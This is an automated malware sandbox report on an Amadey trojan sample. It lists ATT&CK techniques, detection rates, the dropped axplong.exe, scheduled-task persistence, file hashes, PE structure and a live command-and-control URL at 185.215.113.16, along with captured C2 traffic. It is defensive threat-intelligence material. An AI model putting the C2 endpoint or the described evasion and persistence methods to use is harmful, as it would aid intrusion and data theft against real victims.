Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	251 Virtualization/Sandbox Evasion	LSASS Memory	741 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	12 Process Injection	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Obfuscated Files or Information	NTDS	251 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	11 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	12 Software Packing	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 Account Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	1 System Owner/User Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	1 File and Directory Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	224 System Information Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
9ICG2PuZbG.exe	53%	Virustotal		Browse
9ICG2PuZbG.exe	100%	Avira	TR/Crypt.TPM.Gen
9ICG2PuZbG.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	53%	Virustotal		Browse

Source	Detection	Scanner	Label	Link
http://185.215.113.16/Jo89Ku7d/index.phpb1a30a186ec2d30be6db0b5	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpi/;	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpcoded	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.php)	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.php	100%	Avira URL Cloud	malware
http://185.215.113.16/Jo89Ku7d/index.phpd	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpC	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.php	4%	Virustotal		Browse
http://185.215.113.16/Jo89Ku7d/index.phpB	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpd	6%	Virustotal		Browse
http://185.215.113.16/Jo89Ku7d/index.phpcoded	19%	Virustotal		Browse
http://185.215.113.16/Jo89Ku7d/index.phpC	12%	Virustotal		Browse
http://185.215.113.16/Jo89Ku7d/index.phpncodedq	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.php9	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.php3;	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpv	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpB	12%	Virustotal		Browse
http://185.215.113.16/Jo89Ku7d/index.phpu	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpt	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpb1a30a186ec2d30be6db0b5	19%	Virustotal		Browse
http://185.215.113.16/Jo89Ku7d/index.phpS	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpu	15%	Virustotal		Browse
http://185.215.113.16/Jo89Ku7d/index.phpR	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpv	19%	Virustotal		Browse
http://185.215.113.16/Jo89Ku7d/index.phpt	16%	Virustotal		Browse
http://185.215.113.16/Jo89Ku7d/index.phpncoded	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpS	14%	Virustotal		Browse
http://185.215.113.16/Jo89Ku7d/index.phpncoded	9%	Virustotal		Browse
http://185.215.113.16/Jo89Ku7d/index.phpP	10%	Virustotal		Browse
http://185.215.113.16/Jo89Ku7d/index.php9	10%	Virustotal		Browse
http://185.215.113.16/Jo89Ku7d/index.phpR	12%	Virustotal		Browse

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.16/Jo89Ku7d/index.php	true	4%, Virustotal, Browse Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://185.215.113.16/Jo89Ku7d/index.phpb1a30a186ec2d30be6db0b5	axplong.exe, 00000009.00000002.3364157249.000000000127E000.00000004.00000020.00020000.00000000.sdmp	false	19%, Virustotal, Browse Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpcoded	axplong.exe, 00000009.00000002.3364157249.000000000127E000.00000004.00000020.00020000.00000000.sdmp	false	19%, Virustotal, Browse Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.php)	axplong.exe, 00000009.00000002.3364157249.000000000129B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpi/;	axplong.exe, 00000009.00000002.3364157249.0000000001268000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpd	axplong.exe, 00000009.00000002.3364157249.000000000129B000.00000004.00000020.00020000.00000000.sdmp	false	6%, Virustotal, Browse Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpC	axplong.exe, 00000009.00000002.3364157249.000000000127E000.00000004.00000020.00020000.00000000.sdmp	false	12%, Virustotal, Browse Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpB	axplong.exe, 00000009.00000002.3364157249.000000000129B000.00000004.00000020.00020000.00000000.sdmp	false	12%, Virustotal, Browse Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpncodedq	axplong.exe, 00000009.00000002.3364157249.000000000127E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.php9	axplong.exe, 00000009.00000002.3364157249.000000000129B000.00000004.00000020.00020000.00000000.sdmp	false	10%, Virustotal, Browse Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpv	axplong.exe, 00000009.00000002.3364157249.000000000127E000.00000004.00000020.00020000.00000000.sdmp	false	19%, Virustotal, Browse Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.php3;	axplong.exe, 00000009.00000002.3364157249.0000000001268000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpu	axplong.exe, 00000009.00000002.3364157249.000000000129B000.00000004.00000020.00020000.00000000.sdmp	false	15%, Virustotal, Browse Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpt	axplong.exe, 00000009.00000002.3364157249.000000000129B000.00000004.00000020.00020000.00000000.sdmp	false	16%, Virustotal, Browse Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpS	axplong.exe, 00000009.00000002.3364157249.000000000129B000.00000004.00000020.00020000.00000000.sdmp	false	14%, Virustotal, Browse Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpR	axplong.exe, 00000009.00000002.3364157249.000000000129B000.00000004.00000020.00020000.00000000.sdmp	false	12%, Virustotal, Browse Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpP	axplong.exe, 00000009.00000002.3364157249.000000000129B000.00000004.00000020.00020000.00000000.sdmp	false	10%, Virustotal, Browse	unknown
http://185.215.113.16/Jo89Ku7d/index.phpncoded	axplong.exe, 00000009.00000002.3364157249.000000000127E000.00000004.00000020.00020000.00000000.sdmp	false	9%, Virustotal, Browse Avira URL Cloud: phishing	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.215.113.16	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1483403
Start date and time:	2024-07-27 09:33:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 30s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	9ICG2PuZbG.exe renamed because original name is a hash value
Original Sample Name:	c9774cb1f811aa79f9fdc173ee3de6c1.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@5/3@0/1
EGA Information:	Successful, ratio: 25%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target 9ICG2PuZbG.exe, PID 4816 because it is empty
Execution Graph export aborted for target axplong.exe, PID 1804 because there are no executed function
Execution Graph export aborted for target axplong.exe, PID 6048 because there are no executed function
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
03:35:01	API Interceptor	161841x Sleep call for process: axplong.exe modified
09:34:01	Task Scheduler	Run new task: axplong path: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.16	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.16/Jo89Ku7d/index.php
	8NjcvPNvUr.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.16/Jo89Ku7d/index.php
	setup.exe	Get hash	malicious	Amadey	Browse	185.215.113.16/Jo89Ku7d/index.php
	setup.exe	Get hash	malicious	Amadey	Browse	185.215.113.16/Jo89Ku7d/index.php
	setup.exe	Get hash	malicious	Amadey, SmokeLoader	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey, Babadeda, RedLine, Stealc, Vidar	Browse	185.215.113.16/Jo89Ku7d/index.php
	6SoKuOqyNh.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	185.215.113.16/Jo89Ku7d/index.php
	EXyAlLKIck.exe	Get hash	malicious	Amadey	Browse	185.215.113.16/Jo89Ku7d/index.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.16
	f3wrBtIYXx.exe	Get hash	malicious	Amadey	Browse	185.215.113.19
	8NjcvPNvUr.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.16
	11NdzR12PS.exe	Get hash	malicious	Amadey	Browse	185.215.113.19
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.16
	file.exe	Get hash	malicious	Python Stealer, Amadey, Monster Stealer, RedLine, Stealc, Vidar	Browse	185.215.113.16
	setup.exe	Get hash	malicious	Amadey	Browse	185.215.113.19
	setup.exe	Get hash	malicious	Amadey	Browse	185.215.113.16
	setup.exe	Get hash	malicious	Amadey	Browse	185.215.113.19
	setup.exe	Get hash	malicious	Amadey	Browse	185.215.113.16

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Download File

Process:	C:\Users\user\Desktop\9ICG2PuZbG.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1897984
Entropy (8bit):	7.950411286019677
Encrypted:	false
SSDEEP:	49152:ebHYEgxYn9rPTKy3fen0WJ23JVTHMFimNajMY4Jz:guxmj1Gn01JaimEB4
MD5:	C9774CB1F811AA79F9FDC173EE3DE6C1
SHA1:	8E4EEC92572D83710B55750E3DAB9A793E8DC23B
SHA-256:	1DBBF81D6F4B2222B37594E8FF30672BF85FD360F347CBD20B1A5D7B841DD276
SHA-512:	A2577A268C38A0835DC3F49CC9FA2D499617A6BF98202AB862F323F222511930825EC1EF320A75EC66CA6C4375331BA088D16F00AA312906EE2A895CB3739803
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Virustotal, Detection: 53%, Browse
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....@.f..............................K...........@...........................K...........@.................................W...k............................vK..............................vK..................................................... . ............................@....rsrc...............................@....idata ............................@... ..*.........................@...pcxsfzhs......1.....................@...plzfkdac......K.....................@....taggant.0....K.."..................@...........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\9ICG2PuZbG.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

C:\Windows\Tasks\axplong.job

Download File

Process:	C:\Users\user\Desktop\9ICG2PuZbG.exe
File Type:	data
Category:	dropped
Size (bytes):	304
Entropy (8bit):	3.4308071740850083
Encrypted:	false
SSDEEP:	6:ycXlXUEZ+lX1lOJUPelkDdtE9+AQy0l1Rct0:ym1Q1lOmeeDs9+nV1Rct0
MD5:	5A929837AFE7F408B520E0123A9B7EFB
SHA1:	B01EE60EF6C454DE105E345670E3EC8E6DBEF86E
SHA-256:	9615272B91F3F040200466A06E2D1576EE0917C25E570E8EC414753AF45A9A8D
SHA-512:	DA694C73BF6FC91C8E06647304B4FE0EC2AFBA70A5C1CEA4AA31E70C8D8EA51999915E05F46BB82E1DFED66D53182252CCB80EE129FA5C0FC938AA461E633F97
Malicious:	false
Reputation:	low
Preview:	........p..O.B...V..F.......<... .....s.......... ....................<.C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.4.4.1.1.1.d.b.c.4.9.\.a.x.p.l.o.n.g...e.x.e.........E.N.G.I.N.E.E.R.-.P.C.\.e.n.g.i.n.e.e.r...................0.................#.@3P.........................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.950411286019677
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	9ICG2PuZbG.exe
File size:	1'897'984 bytes
MD5:	c9774cb1f811aa79f9fdc173ee3de6c1
SHA1:	8e4eec92572d83710b55750e3dab9a793e8dc23b
SHA256:	1dbbf81d6f4b2222b37594e8ff30672bf85fd360f347cbd20b1a5d7b841dd276
SHA512:	a2577a268c38a0835dc3f49cc9fa2d499617a6bf98202ab862f323f222511930825ec1ef320a75ec66ca6c4375331ba088d16f00aa312906ee2a895cb3739803
SSDEEP:	49152:ebHYEgxYn9rPTKy3fen0WJ23JVTHMFimNajMY4Jz:guxmj1Gn01JaimEB4
TLSH:	B09533031BEAA735EA61C8756AD7B6D768BAC741061026E80C17833DBC43E275392FE5
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x8b9000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66A240BE [Thu Jul 25 12:10:38 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F3A9548EDAAh
paddq mm3, qword ptr [eax+eax]
add byte ptr [eax], al
add byte ptr [eax], al
jmp 00007F3A95490DA5h
add byte ptr [esi], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, 00h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [esi], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ebp+00000080h], dh
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edx+00000000h], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6a057	0x6b	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x69000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x4b76f8	0x10	pcxsfzhs
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x4b76a8	0x18	pcxsfzhs
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x68000	0x2de00	ebd0322787ffa82b7681029ad254cc30	False	0.9967749489100818	data	7.977259343253602	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x69000	0x1e0	0x200	80ea1db8ef66d9a702a0049e12af25e5	False	0.578125	data	4.515349506855509	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x6a000	0x1000	0x200	cc76e3822efdc911f469a3e3cc9ce9fe	False	0.1484375	data	1.0428145631430756	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x6b000	0x2af000	0x200	f70f087bda31f67a29ab52f42f9d3446	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
pcxsfzhs	0x31a000	0x19e000	0x19da00	0f3f166f9899875b9ea59e5e38221959	False	0.9944540457842248	data	7.95412617888117	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
plzfkdac	0x4b8000	0x1000	0x600	048b0968eeca4681e41f030c53def840	False	0.5677083333333334	data	4.877952877015968	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x4b9000	0x3000	0x2200	9886932fadd4a9a3e6b7d91e31a6a916	False	0.06387867647058823	DOS executable (COM)	0.6751943224698626	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x4b7708	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
kernel32.dll	lstrcpy

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-07-27T09:35:15.178285+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	49730	80	192.168.2.6	185.215.113.16
2024-07-27T09:35:03.733473+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	49720	80	192.168.2.6	185.215.113.16
2024-07-27T09:35:09.411291+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	49725	80	192.168.2.6	185.215.113.16
2024-07-27T09:34:19.975301+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49712	40.127.169.103	192.168.2.6
2024-07-27T09:34:57.403458+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49719	13.85.23.86	192.168.2.6

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 27, 2024 09:35:02.981617928 CEST	49720	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:02.987091064 CEST	80	49720	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:02.987293959 CEST	49720	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:02.987384081 CEST	49720	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:02.992677927 CEST	80	49720	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:03.733216047 CEST	80	49720	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:03.733473063 CEST	49720	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:03.735327005 CEST	49720	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:03.740195990 CEST	80	49720	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:03.981780052 CEST	80	49720	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:03.981863022 CEST	49720	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:04.097553015 CEST	49720	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:04.097882986 CEST	49721	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:04.103219986 CEST	80	49720	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:04.103311062 CEST	49720	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:04.103507042 CEST	80	49721	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:04.103590965 CEST	49721	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:04.103796005 CEST	49721	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:04.108922005 CEST	80	49721	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:04.854263067 CEST	80	49721	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:04.854449034 CEST	49721	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:04.855166912 CEST	49721	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:04.862978935 CEST	80	49721	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:05.128138065 CEST	80	49721	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:05.128216982 CEST	49721	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:05.237900972 CEST	49721	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:05.238234043 CEST	49722	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:05.243969917 CEST	80	49722	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:05.243993998 CEST	80	49721	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:05.244086981 CEST	49721	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:05.244261026 CEST	49722	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:05.244261026 CEST	49722	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:05.249320030 CEST	80	49722	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:06.046369076 CEST	80	49722	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:06.046518087 CEST	49722	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:06.047327042 CEST	49722	80	192.168.2.6	185.215.113.16
Jul 27, 2024 09:35:06.052282095 CEST	80	49722	185.215.113.16	192.168.2.6
Jul 27, 2024 09:35:06.294701099 CEST	80	49722	185.215.113.16	192.168.2.6
